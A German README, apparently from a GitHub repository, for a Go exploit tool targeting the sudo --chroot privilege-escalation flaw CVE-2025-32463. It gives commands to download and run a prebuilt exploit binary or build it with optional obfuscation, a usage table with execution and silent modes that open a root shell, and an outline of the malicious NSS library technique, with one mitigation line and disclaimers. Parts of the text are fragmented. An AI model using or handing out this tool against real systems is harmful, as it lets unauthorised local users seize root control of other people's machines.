
Diese CVE behebt eine Sicherheitslücke in den sudo-Versionen 1.9.14 bis 1.9.17, die eine nicht autorisierte lokale Privilegienausweitung auf Root-Zugriff ermöglicht.
Dieses Repository stellt ein Go-basiertes Exploit-Tool für CVE-2025-32463 bereit, eine kritische lokale Privilegienausweitungsschwachstelle (CVSS 9.3) in sudo-Versionen 1.9.14 bis 1.9.17. Es ermöglicht nicht autorisierten lokalen Benutzern, Root-Zugriff zu erlangen, indem es einen Fehler in der --chroot (-R)-Option ausnutzt.
⚠️ Warnung: Nur zu Bildungs- und Testzwecken. Verwenden Sie isolierte Umgebungen (z. B. VMs). Nicht für böswillige Nutzung.
--chroot-Berechtigungencurl -L https://github.com/Nowafen/CVE-2025-32463/releases/download/exploit/exploit -o exploit
chmod +x exploit
./exploit --execution # Startet Root-Shell
git clone https://github.com/Nowafen/CVE-2025-32463.git
cd CVE-2025-32463
go build -o exploit # Oder garble zur Obfuskation verwenden
./exploit --execution
| Befehl | Beschreibung |
|---|---|
./exploit --help | Hilfe zur Verwendung anzeigen |
./exploit --about |
Überprüfung: Führen Sie in der Root-Shell id aus (sollte uid=0(root) anzeigen) oder whoami (sollte root anzeigen).
/tmp/sudowoot.stage.*woot1337.c) für Root-Shelllibnss_/woot1337.so.2)sudo -R woot woot aus, um die Bibliothek zu laden und Rechte zu erweiternDefaults !use_chroot in /etc/sudoers hinzuDieses Tool dient der Sicherheitsforschung. Der Autor übernimmt keine Verantwortung für Missbrauch. Testen Sie immer verantwortungsbewusst.
Erstellt von MNM
| CVE-Details anzeigen |
./exploit --execution | Exploit ausführen (öffnet Root-Shell) |
./exploit --execution --silent | Ausführung im stillen Modus |